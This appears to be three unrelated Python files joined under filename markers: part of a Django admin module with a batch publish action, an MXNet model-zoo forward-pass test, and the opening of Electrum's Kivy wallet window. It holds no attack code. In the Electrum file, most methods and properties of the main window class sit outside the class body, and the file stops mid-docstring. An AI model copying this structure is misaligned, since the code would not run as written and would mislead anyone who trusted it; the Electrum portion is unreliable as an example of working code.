class ResourceMetaInline(admin.TabularInline):
    # Inline "Additional properties" editor for resource metadata rows.
    model = ResourceMeta
    verbose_name = 'Additional property'
    verbose_name_plural = 'Additional properties'
    # list_fields = ('pref_label', )
    show_change_link = True
    max_num = 20  # cap the number of extra property rows
    fields = ('subject', 'metaprop', 'value')
    # list_display = ('pref_label',)
    extra = 1
# Content type of ImportedResource, used by ImportedResourceAdmin.get_queryset.
# NOTE(review): evaluated at import time — this hits the database before the
# app is fully loaded and fails on a fresh DB without migrations; consider
# making it lazy.
IR = ContentType.objects.get_for_model(ImportedResource)
class ImportedResourceAdmin(admin.ModelAdmin):
    """Admin for ImportedResource with a batch 'publish' action."""
    list_display = ('description', 'subtype', '__unicode__')
    search_fields = ['description', 'file', 'remote']
    inlines = [ResourceMetaInline, ]
    actions = ['publish_options', ]
    # Label passed to publish_set_action for logging and dispatch.
    resourcetype = 'importedresource'
    def get_queryset(self, request):
        # Show only plain resources: no subtype, or subtype equal to this model.
        qs = super(ImportedResourceAdmin, self).get_queryset(request)
        # import pdb; pdb.set_trace()
        return qs.filter(Q(subtype__isnull=True) | Q(subtype=IR))
    def publish_options(self, request, queryset):
        """Batch publish with a set of mode options"""
        if 'apply' in request.POST:
            # The user clicked submit on the intermediate form.
            # Perform our update action:
            if request.POST.get('mode') == "CANCEL":
                self.message_user(request,
                    "Cancelled publish action")
            else:
                checkuri = 'checkuri' in request.POST
                # Publishing runs in a background thread; we only get the log URL.
                logfile = publish_set_action(queryset, self.resourcetype, check=checkuri, mode=request.POST.get('mode'))
                self.message_user(request,
                    mark_safe('started publishing in {} mode for {} {}s at <A HREF="{}" target="_log">{}</A>'.format(request.POST.get('mode'), queryset.count(), self.resourcetype, logfile, logfile)))
            # Redirect so a browser refresh does not resubmit the action.
            return HttpResponseRedirect(request.get_full_path())
        # First pass: render the intermediate confirmation form.
        return render(request,
            'admin/admin_publish.html',
            context={'schemes': queryset,
                'pubvars': ConfigVar.getvars('PUBLISH'),
                'reviewvars': ConfigVar.getvars('REVIEW'),
                })
class ObjectBoundListFilter(admin.SimpleListFilter):
    """Filter ServiceBindings by the content type of their first object mapping."""
    title = 'Chain Start by Object Type'
    parameter_name = 'objtype'
    def lookups(self, request, model_admin):
        # One (value, label) pair per distinct bound model.
        chains = ServiceBinding.objects.filter(object_mapping__content_type__isnull=False)
        return set([(c.object_mapping.first().content_type.model, c.object_mapping.first().content_type.model) for c in chains])
    def queryset(self, request, qs):
        # FIX: use the documented SimpleListFilter API (self.value()) rather
        # than reading request.GET directly, and narrow the bare except.
        value = self.value()
        try:
            #import pdb; pdb.set_trace()
            if value:
                qs = qs.filter(object_mapping__content_type__model=value)
        except Exception:
            # Best effort: an invalid filter value leaves the list unfiltered.
            pass
        return qs
class ChainListFilter(admin.SimpleListFilter):
    """Filter by chain membership; the queryset step is currently a no-op."""
    title = 'Chain members'
    parameter_name = 'chain_id'
    def lookups(self, request, model_admin):
        chains = ServiceBinding.objects.filter(object_mapping__name__isnull=False)
        return [(c.id, c.object_mapping.first().name) for c in chains]
    def queryset(self, request, qs):
        # FIX: removed the dead try/except that wrapped only `pass` — the
        # actual filtering was commented out, so this intentionally returns
        # the queryset unchanged.
        # TODO: qs = qs.filter(object_mapping__id=self.value())
        return qs
class NextChainWidget(forms.Select):
    # Select widget that appends an HTML preview of the downstream service
    # chain after the rendered <select> element.
    # NOTE(review): relies on `form_instance` being injected by
    # ServiceBindingAdminForm before render() is called.
    def render(self, name, value, attrs=None):
        # Keep the dropdown in sync with the form field's choices.
        self.choices = self.form_instance.fields['next_service'].choices
        # NOTE(review): super(forms.Select, self) skips Select.render in the
        # MRO and calls the base widget's render — confirm this is intended.
        s = super(forms.Select, self).render(name, value, attrs)
        h = "<BR/>"
        ind = "-> {}<BR/>"
        # Indent each successive hop in the chain a little further.
        for next in self.form_instance.instance.next_chain():
            h = h + ind.format(str(next))
            ind = "--" + ind
        return mark_safe(s + h)
class ServiceBindingAdminForm(forms.ModelForm):
    """ModelForm that swaps in NextChainWidget for the next_service field."""
    def __init__(self, *args, **kwargs):
        super(ServiceBindingAdminForm, self).__init__(*args, **kwargs)
        chain_widget = NextChainWidget()
        chain_widget.form_instance = self  # NextChainWidget.render() needs the form
        self.fields['next_service'].widget = chain_widget
class ServiceBindingAdmin(admin.ModelAdmin):
    """Admin for service bindings with chain-aware filters and a custom form."""
    list_display = ('title', 'binding_type', 'object_mapping_list')
    list_filter = (ObjectBoundListFilter, ChainListFilter, 'binding_type')
    search_fields = ['title', 'binding_type']
    form = ServiceBindingAdminForm
    pass
# Register models with their admin classes. AttributeMapping and
# EmbeddedMapping are intentionally unregistered — they are edited inline
# via ObjectMappingAdmin.
admin.site.register(Namespace, NamespaceAdmin)
admin.site.register(GenericMetaProp, GenericMetaPropAdmin)
admin.site.register(ObjectType, ObjectTypeAdmin)
admin.site.register(ObjectMapping, ObjectMappingAdmin)
#admin.site.register(AttributeMapping, AttributeMappingAdmin)
#admin.site.register(EmbeddedMapping, EmbeddedMappingAdmin)
admin.site.register(ImportedResource, ImportedResourceAdmin)
admin.site.register(ServiceBinding, ServiceBindingAdmin)
admin.site.register(ConfigVar, ConfigVarAdmin)
test_gluon_model_zoo.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
import multiprocessing
import pytest
def eprint(*args, **kwargs):
    """Like built-in print(), but writes to stderr."""
    print(*args, file=sys.stderr, **kwargs)
@pytest.mark.parametrize('model_name', [
    'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
    'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
    'vgg11', 'vgg13', 'vgg16', 'vgg19',
    'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
    'alexnet', 'inceptionv3',
    'densenet121', 'densenet161', 'densenet169', 'densenet201',
    'squeezenet1.0', 'squeezenet1.1',
    'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
    'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
    """Smoke-test one model-zoo network: construct it and run a forward pass."""
    # Only download pretrained weights for the smallest model to keep CI fast.
    use_pretrained = model_name in {'mobilenetv2_0.25'}
    net = get_model(model_name, pretrained=use_pretrained, root='model/')
    # Inception takes 299x299 inputs; every other architecture takes 224x224.
    shape = (2, 3, 299, 299) if 'inception' in model_name else (2, 3, 224, 224)
    eprint('testing forward for %s' % model_name)
    print(net)
    if not use_pretrained:
        net.initialize()
    net(mx.nd.random.uniform(shape=shape)).wait_to_read()
def parallel_download(model_name):
    # Worker for test_parallel_download: fetch pretrained weights into a
    # directory shared by all processes.
    model = get_model(model_name, pretrained=True, root='./parallel_download')
    print(type(model))
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
    """Spawn ten processes that all download the same pretrained model."""
    name = 'mobilenetv2_0.25'
    workers = [multiprocessing.Process(target=parallel_download, args=(name,))
               for _ in range(10)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
# Placeholders for delayed imports (kept lazy for Android startup speed).
notification = app = ref = None
util = False  # replaced by the electrum.util module once imported
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
# Lazy registration so TabbedCarousel can be referenced from kv files.
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
# NOTE: this Label (kivy.core.text) shadows kivy.uix.label.Label imported above.
from kivy.core.text import Label
# Register the Roboto family; the four paths fill the regular/italic/bold/
# bold-italic slots (italic variants reuse the regular/bold files).
Label.register('Roboto',
    'electrum/gui/kivy/data/fonts/Roboto.ttf',
    'electrum/gui/kivy/data/fonts/Roboto.ttf',
    'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
    'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
    """Main Kivy application window for Electrum."""
    electrum_config = ObjectProperty(None)
    language = StringProperty('en')
    # properties might be updated by the network
    num_blocks = NumericProperty(0)
    num_nodes = NumericProperty(0)
    server_host = StringProperty('')
    server_port = StringProperty('')
    num_chains = NumericProperty(0)
    blockchain_name = StringProperty('')
    fee_status = StringProperty('Fee')
    balance = StringProperty('')
    fiat_balance = StringProperty('')
    is_fiat = BooleanProperty(False)
    blockchain_forkpoint = NumericProperty(0)
    # Kivy dispatches on_auto_connect below whenever this flips.
    auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
    """Kivy handler: push the new auto_connect flag into the network layer."""
    params = self.network.get_parameters()
    params = params._replace(auto_connect=self.auto_connect)
    self.network.run_from_another_thread(self.network.set_parameters(params))
def toggle_auto_connect(self, x):
    """Flip auto_connect; the on_auto_connect handler propagates it."""
    self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
    """Kivy handler: push the new oneserver flag into the network layer."""
    params = self.network.get_parameters()
    params = params._replace(oneserver=self.oneserver)
    self.network.run_from_another_thread(self.network.set_parameters(params))
def toggle_oneserver(self, x):
    """Flip oneserver; the on_oneserver handler propagates it."""
    self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
    """Recompute the short proxy description shown in the UI."""
    if proxy.get('mode'):
        self.proxy_str = proxy.get('host') + ':' + proxy.get('port')
    else:
        self.proxy_str = _('None')
def choose_server_dialog(self, popup):
    # Open a ChoiceDialog of known servers; picking one fills the host/port
    # fields of the network-settings popup.
    from .uix.dialogs.choice_dialog import ChoiceDialog
    protocol = 's'  # prefer the SSL port entry
    def cb2(host):
        from electrum import constants
        # Fall back to the network's default ports for unknown hosts.
        pp = servers.get(host, constants.net.DEFAULT_PORTS)
        port = pp.get(protocol, '')
        popup.ids.host.text = host
        popup.ids.port.text = port
    # `servers` is bound after cb2 is defined but before cb2 can run.
    servers = self.network.get_servers()
    ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
    # Let the user pick which chain/fork to follow when several are known.
    from .uix.dialogs.choice_dialog import ChoiceDialog
    chains = self.network.get_blockchains()
    def cb(name):
        # Map the chosen display name back to its chain id, then follow it.
        with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
        for chain_id, b in blockchain_items:
            if name == b.get_name():
                self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
    chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
    chain_objects = filter(lambda b: b is not None, chain_objects)
    names = [b.get_name() for b in chain_objects]
    # Only offer the dialog when there is an actual choice to make.
    if len(names) > 1:
        cur_chain = self.network.blockchain().get_name()
        ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
    """Persist the replace-by-fee preference."""
    self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
    """Persist the use-change-address preference."""
    self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
    """Persist 'confirmed_only' (stored inverted relative to the UI flag)."""
    self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
    """Open the send tab pre-filled from a bitcoin: URI."""
    self.switch_to('send')
    self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
    """Android intent hook: accept bitcoin: URIs, ignore everything else."""
    if intent.getScheme() != 'bitcoin':
        return
    self.set_URI(intent.getDataString())
def on_language(self, instance, language):
    """Switch UI translation when the language property changes."""
    Logger.info('language: {}'.format(language))
    _.switch_lang(language)
def update_history(self, *dt):
    """Refresh the history tab if it has been created."""
    if self.history_screen:
        self.history_screen.update()
def on_quotes(self, d):
    """Exchange-rate quotes arrived: refresh status and history."""
    Logger.info("on_quotes")
    self._trigger_update_status()
    self._trigger_update_history()
def on_history(self, d):
    """Fiat history changed: drop cached coin prices and refresh."""
    Logger.info("on_history")
    self.wallet.clear_coin_price_cache()
    self._trigger_update_history()
def on_fee_histogram(self, *args):
    """Mempool fee histogram updated: refresh history confirmations/fees."""
    self._trigger_update_history()
def _get_bu(self):
    # Current base-unit name (e.g. 'BTC'/'mBTC'), derived from config.
    decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
    try:
        return decimal_point_to_base_unit_name(decimal_point)
    except UnknownBaseUnit:
        # Corrupt/unknown config value: fall back to the default unit.
        return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
    # Persist the chosen unit and redraw amounts.
    assert value in base_units.keys()
    decimal_point = base_unit_name_to_decimal_point(value)
    self.electrum_config.set_key('decimal_point', decimal_point, True)
    self._trigger_update_status()
    self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
    # Fiat currency changed: redraw history with the new rates.
    self._trigger_update_history()
def decimal_point(self):
    # Number of decimal places of the current base unit.
    return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
    """Convert a base-unit amount string to fiat; '' when rates are unavailable."""
    if not amount_str:
        return ''
    if not self.fx.is_enabled():
        return ''
    rate = self.fx.exchange_rate()
    if rate.is_nan():
        return ''
    fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
    # Trim trailing zeros and a dangling decimal point.
    return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
    """Convert a fiat amount string to a base-unit amount string; '' when unavailable."""
    if not fiat_amount:
        return ''
    rate = self.fx.exchange_rate()
    if rate.is_nan():
        return ''
    satoshis = int(pow(10, 8) * Decimal(fiat_amount) / Decimal(rate))
    return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
    """Parse '<number> <unit>' into satoshis; None if the number is invalid."""
    a, u = amount_str.split()
    assert u == self.base_unit
    try:
        x = Decimal(a)
    except Exception:  # FIX: bare except also swallowed KeyboardInterrupt/SystemExit
        return None
    p = pow(10, self.decimal_point())
    return int(p * x)
_orientation = OptionProperty('landscape',
    options=('landscape', 'portrait'))
def _get_orientation(self):
    return self._orientation
orientation = AliasProperty(_get_orientation,
    None,
    bind=('_orientation',))
'''Current screen orientation.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
    return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
    None,
    bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
    """Initialise app state, seed UI properties from config/network, and
    create the rate-limited UI update triggers."""
    # initialize variables
    self._clipboard = Clipboard
    self.info_bubble = None
    self.nfcscanner = None
    self.tabs = None
    self.is_exit = False
    self.wallet = None
    self.pause_time = 0
    App.__init__(self)#, **kwargs)
    title = _('Electrum App')
    self.electrum_config = config = kwargs.get('config', None)
    self.language = config.get('language', 'en')
    self.network = network = kwargs.get('network', None)  # type: Network
    if self.network:
        # Seed the bound UI properties from the current network snapshot.
        self.num_blocks = self.network.get_local_height()
        self.num_nodes = len(self.network.get_interfaces())
        net_params = self.network.get_parameters()
        self.server_host = net_params.host
        self.server_port = net_params.port
        self.auto_connect = net_params.auto_connect
        self.oneserver = net_params.oneserver
        self.proxy_config = net_params.proxy if net_params.proxy else {}
        self.update_proxy_str(self.proxy_config)
    self.plugins = kwargs.get('plugins', [])
    self.gui_object = kwargs.get('gui_object', None)
    self.daemon = self.gui_object.daemon
    self.fx = self.daemon.fx
    self.use_rbf = config.get('use_rbf', True)
    self.use_change = config.get('use_change', True)
    self.use_unconfirmed = not config.get('confirmed_only', False)
    # create triggers so as to minimize updating a max of 2 times a sec
    self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
    self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
    self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
    self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
    # cached dialogs
    self._settings_dialog = None
    self._password_dialog = None
    self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
    # Handle an incoming BIP70 payment request: verify, store, and either
    # open the send screen or report why it cannot be paid.
    if not self.wallet:
        self.show_error(_('No wallet loaded.'))
        return
    if pr.verify(self.wallet.contacts):
        key = self.wallet.invoices.add(pr)
        if self.invoices_screen:
            self.invoices_screen.update()
        status = self.wallet.invoices.get_status(key)
        if status == PR_PAID:
            self.show_error("invoice already paid")
            self.send_screen.do_clear()
        else:
            if pr.has_expired():
                self.show_error(_('Payment request has expired'))
            else:
                self.switch_to('send')
                self.send_screen.set_request(pr)
    else:
        self.show_error("invoice error:" + pr.error)
        self.send_screen.do_clear()
def on_qr(self, data):
    """Dispatch scanned QR contents: address, bitcoin: URI, or raw transaction."""
    from electrum.bitcoin import base_decode, is_address
    data = data.strip()
    if is_address(data):
        self.set_URI(data)
        return
    if data.startswith('bitcoin:'):
        self.set_URI(data)
        return
    # try to decode transaction
    from electrum.transaction import Transaction
    from electrum.util import bh2u
    try:
        text = bh2u(base_decode(data, None, base=43))
        tx = Transaction(text)
        tx.deserialize()
    except Exception:  # FIX: bare except also caught KeyboardInterrupt/SystemExit
        tx = None
    if tx:
        self.tx_dialog(tx)
        return
    # show error
    self.show_error("Unable to decode QR data")
def update_tab(self, name):
    """Refresh one named tab screen if it has been created."""
    screen = getattr(self, name + '_screen', None)
    if screen:
        screen.update()
@profiler
def update_tabs(self):
    """Refresh every tab screen that exists."""
    for tab in ['invoices', 'send', 'history', 'receive', 'address']:
        self.update_tab(tab)
def switch_to(self, name):
    """Make the named tab active, lazily loading its screen on first use."""
    screen = getattr(self, name + '_screen', None)
    if screen is None:
        screen = self.tabs.ids[name + '_screen']
        screen.load_screen()
    panel = self.tabs.ids.panel
    panel.switch_to(self.tabs.ids[name + '_tab'])
def show_request(self, addr):
    """Jump to the receive tab showing the given address."""
    self.switch_to('receive')
    self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
    # Populate and open the invoice.kv popup for a payment request / invoice.
    from electrum.util import format_time
    requestor = req.get('requestor')
    exp = req.get('exp')
    memo = req.get('memo')
    amount = req.get('amount')
    fund = req.get('fund')
    popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
    popup.is_invoice = is_invoice
    popup.amount = amount
    # Invoices show the requestor; own requests show the receiving address.
    popup.requestor = requestor if is_invoice else req.get('address')
    popup.exp = format_time(exp) if exp else ''
    popup.description = memo if memo else ''
    popup.signature = req.get('signature', '')
    popup.status = status
    popup.fund = fund if fund else 0
    txid = req.get('txid')
    popup.tx_hash = txid or ''
    # Outputs are filled once the popup is actually opened.
    popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
    popup.export = self.export_private_keys
    popup.open()
def show_addr_details(self, req, status):
    # Same invoice.kv popup, reused for a plain receiving address.
    from electrum.util import format_time
    fund = req.get('fund')
    isaddr = 'y'
    popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
    popup.isaddr = isaddr
    popup.is_invoice = False
    popup.status = status
    popup.requestor = req.get('address')
    popup.fund = fund if fund else 0
    popup.export = self.export_private_keys
    popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
    # Show `data` as a QR code; on rendering failure fall back to copying
    # the text to the clipboard and telling the user.
    from .uix.dialogs.qr_dialog import QRDialog
    def on_qr_failure():
        # `popup` is bound below before this callback can ever fire.
        popup.dismiss()
        msg = _('Failed to display QR code.')
        if text_for_clipboard:
            msg += '\n' + _('Text copied to clipboard.')
            self._clipboard.copy(text_for_clipboard)
        Clock.schedule_once(lambda dt: self.show_info(msg))
    popup = QRDialog(title, data, show_text, on_qr_failure)
    popup.open()
def scan_qr(self, on_complete):
    # Launch the Android QR scanner activity; `on_complete` receives the
    # scanned text. No-op on non-Android platforms.
    if platform != 'android':
        return
    from jnius import autoclass, cast
    from android import activity
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
    Intent = autoclass('android.content.Intent')
    intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
    def on_qr_result(requestCode, resultCode, intent):
        try:
            if resultCode == -1:  # RESULT_OK:
                # this doesn't work due to some bug in jnius:
                # contents = intent.getStringExtra("text")
                String = autoclass("java.lang.String")
                contents = intent.getStringExtra(String("text"))
                on_complete(contents)
        finally:
            # Always unbind so stale handlers don't accumulate.
            activity.unbind(on_activity_result=on_qr_result)
    activity.bind(on_activity_result=on_qr_result)
    PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
    # Open the Android share sheet with `data` as plain text.
    if platform != 'android':
        return
    from jnius import autoclass, cast
    JS = autoclass('java.lang.String')
    Intent = autoclass('android.content.Intent')
    sendIntent = Intent()
    sendIntent.setAction(Intent.ACTION_SEND)
    sendIntent.setType("text/plain")
    sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
    it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
    currentActivity.startActivity(it)
def build(self):
    # Kivy entry point: load the root widget tree from the main kv file.
    return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
    if platform == 'android':
        # move activity to back
        from jnius import autoclass
        python_act = autoclass('org.kivy.android.PythonActivity')
        mActivity = python_act.mActivity
        mActivity.moveTaskToBack(True)
def on_start(self):
    ''' This is the start point of the kivy ui
    '''
    import time
    # FIX: time.clock() was removed in Python 3.8; perf_counter() is the
    # documented replacement for interval timing.
    Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
    win = Window
    win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
    win.bind(on_key_down=self.on_key_down)
    #win.softinput_mode = 'below_target'
    self.on_size(win, win.size)
    self.init_ui()
    crash_reporter.ExceptionHook(self)
    # init plugins
    run_hook('init_kivy', self)
    # fiat currency
    self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
    # default tab
    self.switch_to('history')
    # bind intent for bitcoin: URI scheme
    if platform == 'android':
        from android import activity
        from jnius import autoclass
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        mactivity = PythonActivity.mActivity
        self.on_new_intent(mactivity.getIntent())
        activity.bind(on_new_intent=self.on_new_intent)
    # connect callbacks
    if self.network:
        interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                     'status', 'new_transaction', 'verified']
        self.network.register_callback(self.on_network_event, interests)
        self.network.register_callback(self.on_fee, ['fee'])
        self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
    # load wallet
    self.load_wallet_by_name(self.electrum_config.get_wallet_path())
    # URI passed in config
    uri = self.electrum_config.get('url')
    if uri:
        self.set_URI(uri)
def get_wallet_path(self):
    """Path of the currently open wallet file, or '' when none is loaded."""
    return self.wallet.storage.path if self.wallet else ''
def on_wizard_complete(self, wizard, wallet):
    """Install-wizard callback: adopt the new wallet, or fall back to the
    last saved wallet when the wizard was cancelled with nothing open."""
    if wallet:  # wizard returned a wallet
        wallet.start_network(self.daemon.network)
        self.daemon.add_wallet(wallet)
        self.load_wallet(wallet)
    elif not self.wallet:
        # wizard did not return a wallet; and there is no wallet open atm
        # try to open last saved wallet (potentially start wizard again)
        self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
    # Open the wallet at `path`: prompt for a PIN if protected, or launch
    # the install wizard when no wallet exists at that path.
    if not path:
        return
    if self.wallet and self.wallet.storage.path == path:
        return  # already open
    wallet = self.daemon.load_wallet(path, None)
    if wallet:
        if wallet.has_password():
            # Wrong/cancelled PIN stops the app entirely.
            self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
        else:
            self.load_wallet(wallet)
    else:
        def launch_wizard():
            storage = WalletStorage(path, manual_upgrades=True)
            wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
            wizard.bind(on_wizard_complete=self.on_wizard_complete)
            action = wizard.storage.get_action()
            wizard.run(action)
        if not ask_if_wizard:
            launch_wizard()
        else:
            # Ask first (e.g. after a cancelled wizard) before re-launching.
            from .uix.dialogs.question import Question
            def handle_answer(b: bool):
                if b:
                    launch_wizard()
                else:
                    # Clean up the never-completed wallet file and quit.
                    try: os.unlink(path)
                    except FileNotFoundError: pass
                    self.stop()
            d = Question(_('Do you want to launch the wizard again?'), handle_answer)
            d.open()
def on_stop(self):
    """Kivy shutdown hook: remember and close the open wallet."""
    Logger.info('on_stop')
    if self.wallet:
        self.electrum_config.save_last_wallet(self.wallet)
        self.stop_wallet()
def stop_wallet(self):
    """Detach the current wallet from the daemon, if any."""
    if self.wallet:
        self.daemon.stop_wallet(self.wallet.storage.path)
        self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
    # Desktop keyboard shortcuts (Ctrl+Q/W quit, Ctrl+R refresh).
    if 'ctrl' in modifiers:
        # q=24 w=25
        if keycode in (24, 25):
            self.stop()
        elif keycode == 27:
            # r=27
            # force update wallet
            self.update_wallet()
        elif keycode == 112:
            # pageup
            #TODO move to next tab
            pass
        elif keycode == 117:
            # pagedown
            #TODO move to prev tab
            pass
    #TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
    # Android back button (27): require a second press to exit.
    if key == 27 and self.is_exit is False:
        self.is_exit = True
        self.show_info(_('Press again to exit'))
        return True
    # override settings button
    if key in (319, 282):  # f1/settings button on android
        #self.gui.main_gui.toggle_settings(self)
        return True
def settings_dialog(self):
    # Lazily create, refresh, and open the (cached) settings dialog.
    from .uix.dialogs.settings import SettingsDialog
    if self._settings_dialog is None:
        self._settings_dialog = SettingsDialog(self)
    self._settings_dialog.update()
    self._settings_dialog.open()
def popup_dialog(self, name):
    # Open a popup by name: special-cased dialogs, or a kv file of that name.
    if name == 'settings':
        self.settings_dialog()
    elif name == 'wallets':
        from .uix.dialogs.wallets import WalletDialog
        d = WalletDialog()
        d.open()
    elif name == 'status':
        popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
        master_public_keys_layout = popup.ids.master_public_keys
        # The first master key is already in the kv template; add the rest.
        for xpub in self.wallet.get_master_public_keys()[1:]:
            master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
            ref = RefLabel()
            ref.name = _('Master Public Key')
            ref.data = xpub
            master_public_keys_layout.add_widget(ref)
        popup.open()
    else:
        popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
        popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
